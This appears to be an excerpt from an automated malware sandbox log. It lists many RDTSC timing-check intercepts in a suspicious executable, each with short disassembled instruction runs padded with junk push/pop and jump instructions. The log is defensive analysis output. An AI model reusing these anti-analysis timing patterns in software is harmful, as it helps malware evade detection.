Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E86A4 second address: 4E86A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E86A9 second address: 4E86B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E86B9 second address: 4E86BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E86BD second address: 4E86C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E8737 second address: 4E873B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F248 second address: 50F24D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F24D second address: 50F252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F252 second address: 50F258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F3DC second address: 50F3E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50F682 second address: 50F68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518A18 second address: 518A3F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10A35F6h 0x00000008 je 00007F5BC10A35F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F5BC10A3607h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 517457 second address: 51745B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 517D17 second address: 517D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F5BC10A35F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 517D2C second address: 517D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518158 second address: 51815C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51815C second address: 518164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518164 second address: 518169 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5182D1 second address: 5182E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnp 00007F5BC10B709Ch 0x0000000d jl 00007F5BC10B7096h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5182E4 second address: 5182EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5182EA second address: 5182FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518458 second address: 518468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F5BC10A35F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 518468 second address: 51846C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51A4EB second address: 51A4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F5BC10A35FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51A4F8 second address: 51A4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51A4FC second address: 51A518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3606h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51A518 second address: 51A54B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F5BC10B70B5h 0x00000011 pushad 0x00000012 jmp 00007F5BC10B70A3h 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51C7AC second address: 51C7B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51FA27 second address: 51FA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5243C0 second address: 5243E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F5BC10A35F8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F5BC10A3601h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524559 second address: 52455D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 523B3E second address: 523B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5BC10A35F6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5BC10A3600h 0x00000012 jmp 00007F5BC10A3603h 0x00000017 popad 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524812 second address: 524816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524816 second address: 524826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524826 second address: 524836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5BC10B7096h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524836 second address: 52483C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52483C second address: 524845 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5249B9 second address: 5249BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5249BD second address: 5249CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5BC10B709Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 524DA9 second address: 524DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F5BC10A35F6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 527BD2 second address: 527BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 527E99 second address: 527EA3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5BC10A35F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 527EA3 second address: 527EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5BC10B7096h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 527EAF second address: 527EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A5AF second address: 52A5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10B70A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A5C4 second address: 52A5CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A26F second address: 52A28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5BC10B70A2h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A28A second address: 52A29A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52A29A second address: 52A2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F5BC10B7096h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52E479 second address: 52E494 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BC10A35FDh 0x0000000b jl 00007F5BC10A3602h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52EA13 second address: 52EA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52EA19 second address: 52EA2F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BC10A35F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jc 00007F5BC10A35F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 52EA2F second address: 52EA3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5354C3 second address: 5354F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5BC10A3600h 0x0000000b popad 0x0000000c push ecx 0x0000000d ja 00007F5BC10A35F6h 0x00000013 jns 00007F5BC10A35F6h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jp 00007F5BC10A35F6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5354F2 second address: 5354F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E33 second address: 533E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5BC10A35F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E3D second address: 533E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E41 second address: 533E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5BC10A35F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E4F second address: 533E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533E53 second address: 533E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533FA0 second address: 533FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 533FA4 second address: 533FB8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5BC10A35F6h 0x00000008 jnp 00007F5BC10A35F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5341FA second address: 5341FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5341FE second address: 53420E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BC10A35F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53420E second address: 534212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534363 second address: 534380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3604h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534380 second address: 534386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534386 second address: 53438C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E822D second address: 4E8239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F5BC10B7096h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 4E8362 second address: 4E83B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F5BC10A3607h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F5BC10A35F6h 0x00000014 popad 0x00000015 popad 0x00000016 nop 0x00000017 pushad 0x00000018 mov dword ptr [ebp+12474C7Ah], eax 0x0000001e mov dword ptr [ebp+122D54C2h], eax 0x00000024 popad 0x00000025 push 0000001Eh 0x00000027 mov dword ptr [ebp+122D288Fh], ecx 0x0000002d sub dword ptr [ebp+1247BFE9h], ebx 0x00000033 nop 0x00000034 jp 00007F5BC10A3600h 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534665 second address: 534669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 534669 second address: 53466F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 537BB5 second address: 537BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 537BBB second address: 537BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53ECB7 second address: 53ECBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53ECBB second address: 53ECBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53F244 second address: 53F25A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53F25A second address: 53F263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53FA96 second address: 53FAAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BC10B70A0h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 53FAAF second address: 53FADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5BC10A3603h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F5BC10A360Ah 0x00000012 jmp 00007F5BC10A35FCh 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 54364A second address: 54364E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 54364E second address: 543652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 543A3F second address: 543A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A0h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F5BC10B7096h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 543A61 second address: 543A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 543A65 second address: 543A9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A6h 0x00000007 jmp 00007F5BC10B70A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnc 00007F5BC10B709Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 545AF6 second address: 545AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 545AFC second address: 545B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 54BBCB second address: 54BBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 54BBCF second address: 54BBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55680B second address: 55680F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55680F second address: 55681D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5BC10B7096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 55681D second address: 556823 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A4A second address: 554A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A4E second address: 554A74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5BC10A35FCh 0x0000000c jnp 00007F5BC10A35F6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5BC10A35FDh 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A74 second address: 554A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A78 second address: 554A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BC10A3600h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A8E second address: 554A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554A95 second address: 554ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BC10A35FDh 0x00000009 popad 0x0000000a jp 00007F5BC10A3608h 0x00000010 jmp 00007F5BC10A35FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 554D35 second address: 554D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5BC10B7096h 0x0000000a rdtsc
